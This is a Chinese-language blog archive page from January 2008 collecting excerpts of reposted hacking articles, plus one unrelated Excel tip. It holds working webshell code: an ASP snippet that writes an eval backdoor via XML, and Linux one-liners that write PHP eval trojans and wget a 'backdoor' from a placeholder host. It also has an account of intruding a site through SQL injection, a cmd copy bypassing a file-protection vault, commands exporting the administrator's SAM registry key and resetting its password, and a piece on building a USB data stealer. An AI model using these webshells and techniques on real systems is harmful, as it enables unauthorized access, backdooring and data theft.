2008年1月 的日志

xml写马

来源:WEB安全手册|Trace's Space

<%
set xmldoc = Server.CreateObject("Msxml2.DOMDocument.3.0")
xmldoc.loadXml("<p></p>")
xmldoc.documentElement.appendChild xmldoc.createComment("<"+"% execute(request(chr(35))) %"+ ">")
xmldoc.save(server.mappath("sample.asp"))
Response.Redirect "sample.asp"
%>

Tags:

对于ACCESS跨库的一些研究

转载请保留版权标记,谢谢
——————————-by 大蝉@http://blog.gsnsg.com/weblog/usual/ QQ:271607603——————————————

今天入侵了一个ACCESS的站,思考了一些问题,记性不好,怕忘了,记录一下:

这个站设置很变态,什么都没有,连FSO都删了,好不容易找到一个宝贵的注入,点几经周折进了后台,看到可以更改上传类型,大喜,可是怎么改也改不了,最后发现上传类型记录在config.asp里,没FSO根本改不了,Faint…..

我只能围绕这个唯一的注入点展开思考,如果是SQL那该多好,如果是SA权限那该多好,艾, YY是没用的,我还是被ACCESS少得可怜的功能阻挡住了
阅读全文 »

Tags: ,

一行代码都不写,穿透金山安全岛

作者:MJ0011
来源:MJ0011的内核驱动研究所

金山文件安全岛会把要保护的文件COPY到My Document\金山安全岛\文档

当要访问这个目录的文件时,就会提示拒绝

穿透方法,直接运行cmd.exe(我的My Document目录在D盘根目录下)

>d:

d:\>cd MYDOCU~1

d:\>MYDOCU~1\>copy 金山安全岛\文档\被保护文件.xxx e:\xxxxx.xxx

可成功COPY

Tags:

LINUX下写入一句话木马的方法整理

文章作者:pt007[at]vip.sina.com
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。

LINUX下写入一句话木马的方法整理:
(1)echo '<?eval($cmd);?>' > /home/web/www/PREFIX/htdocs/mu.php
(2)echo "<?fputs(fopen('1.php','w+'),'<?eval($_POST[c]);?>');?>" >test11.php
(3)"system('wget http://xxxxxx.com/backdoor -P /tmp')"
阅读全文 »

Tags:

导出管理员密码文件

来源:红狼

sa默认可以读sam键.应该。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:\test.reg
根本不用克隆.
找到对应的sid.

Tags:

枚举注册表搜索病毒痕迹的实现思路

作者:灰狐
来源:灰狐's Blog

注:本文已发表在<黑客防线>2008年第1期,转载请注明出处.

在第11期的《黑客防线》中,我那篇关于algsrvs病毒专杀的文章中有点不太完美的地方,就是没有把清理注册表那一部分写完整,一个原因就是我在那里说的因为当时我已经把病毒清理干净了,没有记录下每一个相应键值的位置;还有一个原因就是就算我记录下来了,也是一件相当麻烦的事情,因为病毒在注册表中写入的信息相当地多,大概有几十处,这样一个一个删还不把人累死?

当然也不是没有办法,我今天就用一种比较简单的思路来进行演示:首先完整枚举所有项,检查其键值是否被病毒修改过,然后进入子项中递归调用此函数完成遍历注册表的功能。

为了程序的通用性,今天我就不用VCL库中的Registry类了,改用Windo 阅读全文 »

Tags: ,

锻造完美U盘小偷:活用消息机制

作者:灰狐
来源:灰狐's Blog

注:本文已发表在<黑客防线>2008年第1期,转载请注明出处.

以前经常看到有人做出一些蛮有意思的小工具,其中最多的似乎就是所谓的U盘小偷了——偷偷地把你U盘里的东西copy出来的东西。

根据以前的《黑客防线》来看,就这一类的工具已经N多了,有脚本或批处理的、有VC的、有BCB的、有delphi或VB的,五花八门;当然其中各个的技术含量也是大不相同,大多数都是采用最常规的做法。注入进程的见过不少,但居然很少有讲使用消息机制的。(也许有不少,但在杂志上没看到过)

今天我就综合采用多种方法来打造一个尽量完善的U盘小偷;我没有采用任何比较难的技术,而是演示怎样综合利用各种思路来弥补技术上的不足。

首先得搞清楚我们的小偷具体要做什么,就是所谓的系统分析 阅读全文 »

Tags:

试一试,也许一切皆有可能! (二)

作者:breach
来源:breach-一个奇妙的名字

1、excel 取消隐藏

引摘于:zhidao.baidu.com/question/23548304.html
两种方法:
1、用鼠标选取你隐藏的那几列(最好多选取几列),然后点工具栏上的“格式”——“列”——“取消隐藏”,搞定!
2、手动解决:用鼠标指到隐藏列的字母旁边,当变成十字形的图标时,按下鼠标拖动即可,其他列同理

祝你成功!

2、文件关联,播放FLV文件 阅读全文 »